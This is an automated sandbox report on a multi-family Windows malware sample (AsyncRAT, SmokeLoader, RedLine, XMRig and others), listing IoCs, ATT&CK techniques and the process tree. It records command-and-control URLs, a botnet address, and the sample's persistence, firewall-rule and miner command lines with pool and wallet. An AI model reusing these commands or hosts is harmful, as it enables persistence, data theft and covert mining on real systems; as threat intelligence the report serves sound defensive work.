asyncrat | 395a803ba3e091e6ac2629c5591e6cd874f68332a436287d0121f5f21b3524e6

Analysis

max time kernel
135s
max time network
153s
platform
windows10_x64
resource
win10v20210408
submitted
16-09-2021 14:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6b53e5d2d9ce484483c7580162272e18.exe
Size

259KB
MD5

6b53e5d2d9ce484483c7580162272e18
SHA1

4d044581e69f2bb876ddb15e45d15d79207360f7
SHA256

395a803ba3e091e6ac2629c5591e6cd874f68332a436287d0121f5f21b3524e6
SHA512

3c2d68b3e2e5df3d27d53964905116db1b498ff87b9a0ad04a007e2df58d2244e08a61ed34b5b42b5289b110519c88168805f6d48ff37dbc741b04bbdd9b96bd

Score

10^/10

asyncrat raccoon redline smokeloader tofsee xmrig 33 backdoor discovery evasion infostealer miner persistence rat spyware stealer themida trojan

Malware Config

Extracted

Family

smokeloader

Version

2020

http://fazanaharahe1.xyz/

http://xandelissane2.xyz/

http://ustiassosale3.xyz/

http://cytheriata4.xyz/

http://ggiergionard5.xyz/

http://rrelleynaniy6.store/

http://danniemusoa7.store/

http://nastanizab8.store/

http://onyokandis9.store/

http://dmunaavank10.store/

http://gilmandros11.site/

http://cusanthana12.site/

http://willietjeana13.site/

http://ximusokall14.site/

http://blodinetisha15.site/

http://urydiahadyss16.club/

http://glasamaddama17.club/

http://marlingarly18.club/

http://alluvianna19.club/

http://xandirkaniel20.club/

rc4.i32

Extracted

Family

redline

Botnet

94.26.248.150:17618

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3104-147-0x0000000002260000-0x000000000227F000-memory.dmp	family_redline
behavioral2/memory/3104-154-0x0000000002490000-0x00000000024AE000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/3648-230-0x0000000000400000-0x0000000000414000-memory.dmp	asyncrat
behavioral2/memory/3648-231-0x000000000040F3CE-mapping.dmp	asyncrat
behavioral2/memory/2492-346-0x000000000040F3CE-mapping.dmp	asyncrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

XMRig Miner Payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4176-336-0x000000000312259C-mapping.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 14 IoCs

Processes:

B56B.exeC0D6.exeCB18.execffaghecffaghe3230.exe37DE.exe4452.exeamyggrgo.exe5328.exe4452.exe60F4.exe6B75.exe7152.exe

pid	process
3832	B56B.exe
2420	C0D6.exe
3104	CB18.exe
2512	cffaghe
3268	cffaghe
2652	3230.exe
3000	37DE.exe
1968	4452.exe
644	amyggrgo.exe
3132	5328.exe
3648	4452.exe
3624	60F4.exe
3380	6B75.exe
1004	7152.exe

Modifies Installed Components in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

3230.exeB56B.exeC0D6.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3230.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3230.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	B56B.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	B56B.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	C0D6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	C0D6.exe

Deletes itself 1 IoCs

Processes:

pid process

3092
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3092

Themida packer 9 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\B56B.exe	themida
C:\Users\Admin\AppData\Local\Temp\B56B.exe	themida
C:\Users\Admin\AppData\Local\Temp\C0D6.exe	themida
C:\Users\Admin\AppData\Local\Temp\C0D6.exe	themida
behavioral2/memory/3832-126-0x0000000000C70000-0x0000000000C71000-memory.dmp	themida
behavioral2/memory/2420-129-0x0000000001250000-0x0000000001251000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\3230.exe	themida
C:\Users\Admin\AppData\Local\Temp\3230.exe	themida
behavioral2/memory/2652-192-0x0000000001360000-0x0000000001A57000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

B56B.exeC0D6.exe3230.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	B56B.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	C0D6.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3230.exe

Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

explorer.exe

description ioc process

File opened (read-only) \??\D: explorer.exe
Drops file in System32 directory 1 IoCs

Processes:

svchost.exe

description ioc process

File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

B56B.exeC0D6.exe3230.exe

pid process

3832 B56B.exe
2420 C0D6.exe
2652 3230.exe

description	ioc	process
File opened (read-only)	\??\D:	explorer.exe

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

6b53e5d2d9ce484483c7580162272e18.execffagheamyggrgo.exe4452.exe4452.exe

description	pid	process	target process
PID 644 set thread context of 792	644	6b53e5d2d9ce484483c7580162272e18.exe	6b53e5d2d9ce484483c7580162272e18.exe
PID 2512 set thread context of 3268	2512	cffaghe	cffaghe
PID 644 set thread context of 2260	644	amyggrgo.exe	svchost.exe
PID 1968 set thread context of 3648	1968	4452.exe	4452.exe
PID 3648 set thread context of 512	3648	4452.exe	cvtres.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

cffaghe6b53e5d2d9ce484483c7580162272e18.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cffaghe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cffaghe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6b53e5d2d9ce484483c7580162272e18.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6b53e5d2d9ce484483c7580162272e18.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6b53e5d2d9ce484483c7580162272e18.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cffaghe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

3230.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	3230.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	3230.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3920 schtasks.exe
4824 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1160 timeout.exe

pid	process
3920	schtasks.exe
4824	schtasks.exe

pid	process
1160	timeout.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Buses	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = d4cd473e4582290424edb47d450dd49d084297dce82e72baa46d34fdc48d541d3e43906387cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda56814d8814a7c35e5a9644490bdb67c2ced965901cec4e53d428dc9741035faa16912d5814f733fd4f10b4c90d8f6127db9a45b3494b48d662fd69a430f32fea05d579fc2223064b9f86400c589b17a22ea9c5a03c8c4e13b7e85c12b496da0f15d15d88448713aeca5551af459a48e149cebd06dfdc48d541ce4ad744a6bbfff02579fc27d440dd49d642df4ccd8c16098a46d34fdc741461ee4ad743c35f4a77311db9a4c703bfaac5c15f4bd844d14dda46d34fdc48d541de4ad743d04cd945d24edb47d440dd49d642df4bd844d14dda46d34fdc48d541de4ad743de1cc945d	svchost.exe

Modifies registry class 9 IoCs

Processes:

explorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

6b53e5d2d9ce484483c7580162272e18.exe

pid	process
792	6b53e5d2d9ce484483c7580162272e18.exe
792	6b53e5d2d9ce484483c7580162272e18.exe
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092
3092

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3092
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

6b53e5d2d9ce484483c7580162272e18.execffaghe

pid process

792 6b53e5d2d9ce484483c7580162272e18.exe
3268 cffaghe

pid	process
3092

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

B56B.exeC0D6.exeCB18.exe

description	pid	process
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeDebugPrivilege	3832	B56B.exe
Token: SeDebugPrivilege	2420	C0D6.exe
Token: SeDebugPrivilege	3104	CB18.exe
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092
Token: SeCreatePagefilePrivilege	3092
Token: SeShutdownPrivilege	3092

Suspicious use of FindShellTrayWindow 12 IoCs

Processes:

explorer.exe

pid process

3092
3092
3092
3092
3092
3092
3092
3092
3128 explorer.exe
3128 explorer.exe
3128 explorer.exe
3128 explorer.exe
Suspicious use of SendNotifyMessage 9 IoCs

Processes:

explorer.exe

pid process

3092
3128 explorer.exe
3128 explorer.exe
3128 explorer.exe
3128 explorer.exe
3128 explorer.exe
3128 explorer.exe
3128 explorer.exe
3128 explorer.exe

pid	process
3092
3092
3092
3092
3092
3092
3092
3092
3128	explorer.exe
3128	explorer.exe
3128	explorer.exe
3128	explorer.exe

pid	process
3092
3128	explorer.exe
3128	explorer.exe
3128	explorer.exe
3128	explorer.exe
3128	explorer.exe
3128	explorer.exe
3128	explorer.exe
3128	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6b53e5d2d9ce484483c7580162272e18.execffaghe37DE.exeamyggrgo.exe4452.exe

description	pid	process	target process
PID 644 wrote to memory of 792	644	6b53e5d2d9ce484483c7580162272e18.exe	6b53e5d2d9ce484483c7580162272e18.exe
PID 644 wrote to memory of 792	644	6b53e5d2d9ce484483c7580162272e18.exe	6b53e5d2d9ce484483c7580162272e18.exe
PID 644 wrote to memory of 792	644	6b53e5d2d9ce484483c7580162272e18.exe	6b53e5d2d9ce484483c7580162272e18.exe
PID 644 wrote to memory of 792	644	6b53e5d2d9ce484483c7580162272e18.exe	6b53e5d2d9ce484483c7580162272e18.exe
PID 644 wrote to memory of 792	644	6b53e5d2d9ce484483c7580162272e18.exe	6b53e5d2d9ce484483c7580162272e18.exe
PID 644 wrote to memory of 792	644	6b53e5d2d9ce484483c7580162272e18.exe	6b53e5d2d9ce484483c7580162272e18.exe
PID 3092 wrote to memory of 3832	3092		B56B.exe
PID 3092 wrote to memory of 3832	3092		B56B.exe
PID 3092 wrote to memory of 3832	3092		B56B.exe
PID 3092 wrote to memory of 2420	3092		C0D6.exe
PID 3092 wrote to memory of 2420	3092		C0D6.exe
PID 3092 wrote to memory of 2420	3092		C0D6.exe
PID 3092 wrote to memory of 3104	3092		CB18.exe
PID 3092 wrote to memory of 3104	3092		CB18.exe
PID 3092 wrote to memory of 3104	3092		CB18.exe
PID 2512 wrote to memory of 3268	2512	cffaghe	cffaghe
PID 2512 wrote to memory of 3268	2512	cffaghe	cffaghe
PID 2512 wrote to memory of 3268	2512	cffaghe	cffaghe
PID 2512 wrote to memory of 3268	2512	cffaghe	cffaghe
PID 2512 wrote to memory of 3268	2512	cffaghe	cffaghe
PID 2512 wrote to memory of 3268	2512	cffaghe	cffaghe
PID 3092 wrote to memory of 2652	3092		3230.exe
PID 3092 wrote to memory of 2652	3092		3230.exe
PID 3092 wrote to memory of 2652	3092		3230.exe
PID 3092 wrote to memory of 3000	3092		37DE.exe
PID 3092 wrote to memory of 3000	3092		37DE.exe
PID 3092 wrote to memory of 3000	3092		37DE.exe
PID 3000 wrote to memory of 2712	3000	37DE.exe	cmd.exe
PID 3000 wrote to memory of 2712	3000	37DE.exe	cmd.exe
PID 3000 wrote to memory of 2712	3000	37DE.exe	cmd.exe
PID 3000 wrote to memory of 4044	3000	37DE.exe	cmd.exe
PID 3000 wrote to memory of 4044	3000	37DE.exe	cmd.exe
PID 3000 wrote to memory of 4044	3000	37DE.exe	cmd.exe
PID 3092 wrote to memory of 1968	3092		4452.exe
PID 3092 wrote to memory of 1968	3092		4452.exe
PID 3092 wrote to memory of 1968	3092		4452.exe
PID 3000 wrote to memory of 2728	3000	37DE.exe	sc.exe
PID 3000 wrote to memory of 2728	3000	37DE.exe	sc.exe
PID 3000 wrote to memory of 2728	3000	37DE.exe	sc.exe
PID 3000 wrote to memory of 3740	3000	37DE.exe	sc.exe
PID 3000 wrote to memory of 3740	3000	37DE.exe	sc.exe
PID 3000 wrote to memory of 3740	3000	37DE.exe	sc.exe
PID 3000 wrote to memory of 3452	3000	37DE.exe	sc.exe
PID 3000 wrote to memory of 3452	3000	37DE.exe	sc.exe
PID 3000 wrote to memory of 3452	3000	37DE.exe	sc.exe
PID 3000 wrote to memory of 3020	3000	37DE.exe	netsh.exe
PID 3000 wrote to memory of 3020	3000	37DE.exe	netsh.exe
PID 3000 wrote to memory of 3020	3000	37DE.exe	netsh.exe
PID 644 wrote to memory of 2260	644	amyggrgo.exe	svchost.exe
PID 644 wrote to memory of 2260	644	amyggrgo.exe	svchost.exe
PID 644 wrote to memory of 2260	644	amyggrgo.exe	svchost.exe
PID 644 wrote to memory of 2260	644	amyggrgo.exe	svchost.exe
PID 644 wrote to memory of 2260	644	amyggrgo.exe	svchost.exe
PID 3092 wrote to memory of 3132	3092		5328.exe
PID 3092 wrote to memory of 3132	3092		5328.exe
PID 3092 wrote to memory of 3132	3092		5328.exe
PID 1968 wrote to memory of 3648	1968	4452.exe	4452.exe
PID 1968 wrote to memory of 3648	1968	4452.exe	4452.exe
PID 1968 wrote to memory of 3648	1968	4452.exe	4452.exe
PID 1968 wrote to memory of 3648	1968	4452.exe	4452.exe
PID 1968 wrote to memory of 3648	1968	4452.exe	4452.exe
PID 1968 wrote to memory of 3648	1968	4452.exe	4452.exe
PID 1968 wrote to memory of 3648	1968	4452.exe	4452.exe
PID 1968 wrote to memory of 3648	1968	4452.exe	4452.exe

C:\Users\Admin\AppData\Local\Temp\6b53e5d2d9ce484483c7580162272e18.exe
"C:\Users\Admin\AppData\Local\Temp\6b53e5d2d9ce484483c7580162272e18.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:644

C:\Users\Admin\AppData\Local\Temp\6b53e5d2d9ce484483c7580162272e18.exe
"C:\Users\Admin\AppData\Local\Temp\6b53e5d2d9ce484483c7580162272e18.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:792

C:\Users\Admin\AppData\Local\Temp\B56B.exe
C:\Users\Admin\AppData\Local\Temp\B56B.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3832

C:\Users\Admin\AppData\Local\Temp\C0D6.exe
C:\Users\Admin\AppData\Local\Temp\C0D6.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2420

C:\Users\Admin\AppData\Local\Temp\CB18.exe
C:\Users\Admin\AppData\Local\Temp\CB18.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3104

C:\Users\Admin\AppData\Roaming\cffaghe
C:\Users\Admin\AppData\Roaming\cffaghe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2512

C:\Users\Admin\AppData\Roaming\cffaghe
C:\Users\Admin\AppData\Roaming\cffaghe
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3268

C:\Users\Admin\AppData\Local\Temp\3230.exe
C:\Users\Admin\AppData\Local\Temp\3230.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:2652

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\wXksrUBcyPoP & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\3230.exe"
2⤵
PID:904

C:\Windows\SysWOW64\timeout.exe
timeout 4
3⤵
- Delays execution with timeout.exe
PID:1160

C:\Users\Admin\AppData\Local\Temp\37DE.exe
C:\Users\Admin\AppData\Local\Temp\37DE.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3000

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ltvgwxr\
2⤵
PID:2712

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\amyggrgo.exe" C:\Windows\SysWOW64\ltvgwxr\
2⤵
PID:4044

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create ltvgwxr binPath= "C:\Windows\SysWOW64\ltvgwxr\amyggrgo.exe /d\"C:\Users\Admin\AppData\Local\Temp\37DE.exe\"" type= own start= auto DisplayName= "wifi support"
2⤵
PID:2728

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description ltvgwxr "wifi internet conection"
2⤵
PID:3740

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start ltvgwxr
2⤵
PID:3452

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
2⤵
PID:3020

C:\Users\Admin\AppData\Local\Temp\4452.exe
C:\Users\Admin\AppData\Local\Temp\4452.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1968

C:\Users\Admin\AppData\Local\Temp\4452.exe
"C:\Users\Admin\AppData\Local\Temp\4452.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3648

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
3⤵
- Enumerates connected drives
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3128

C:\Windows\system32\ctfmon.exe
ctfmon.exe
4⤵
PID:3932

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
3⤵
PID:512

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
4⤵
PID:2492

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /sc minute /mo 1 /tn "Nano" /tr "'C:\Users\Admin\AppData\Roaming\Winrar\Winrar.exe'" /f
4⤵
PID:4736

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nano" /tr "'C:\Users\Admin\AppData\Roaming\Winrar\Winrar.exe'" /f
5⤵
- Creates scheduled task(s)
PID:4824

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" "C:\Users\Admin\AppData\Roaming\Winrar\Winrar.exe"
4⤵
PID:4748

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /sc minute /mo 1 /tn "Nano" /tr "'C:\Users\Admin\AppData\Roaming\Winrar\Winrar.exe'" /f
2⤵
PID:1544

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nano" /tr "'C:\Users\Admin\AppData\Roaming\Winrar\Winrar.exe'" /f
3⤵
- Creates scheduled task(s)
PID:3920

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\4452.exe" "C:\Users\Admin\AppData\Roaming\Winrar\Winrar.exe"
2⤵
PID:1016

C:\Windows\SysWOW64\ltvgwxr\amyggrgo.exe
C:\Windows\SysWOW64\ltvgwxr\amyggrgo.exe /d"C:\Users\Admin\AppData\Local\Temp\37DE.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:644

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2260

C:\Windows\SysWOW64\svchost.exe
svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
3⤵
PID:4176

C:\Users\Admin\AppData\Local\Temp\5328.exe
C:\Users\Admin\AppData\Local\Temp\5328.exe
1⤵
- Executes dropped EXE
PID:3132

C:\Users\Admin\AppData\Local\Temp\60F4.exe
C:\Users\Admin\AppData\Local\Temp\60F4.exe
1⤵
- Executes dropped EXE
PID:3624

C:\Users\Admin\AppData\Local\Temp\60F4.exe
"C:\Users\Admin\AppData\Local\Temp\60F4.exe"
2⤵
PID:4976

C:\Users\Admin\AppData\Local\Temp\6B75.exe
C:\Users\Admin\AppData\Local\Temp\6B75.exe
1⤵
- Executes dropped EXE
PID:3380

C:\Users\Admin\AppData\Local\Temp\7152.exe
C:\Users\Admin\AppData\Local\Temp\7152.exe
1⤵
- Executes dropped EXE
PID:1004

C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
1⤵
PID:3856

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
PID:644

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

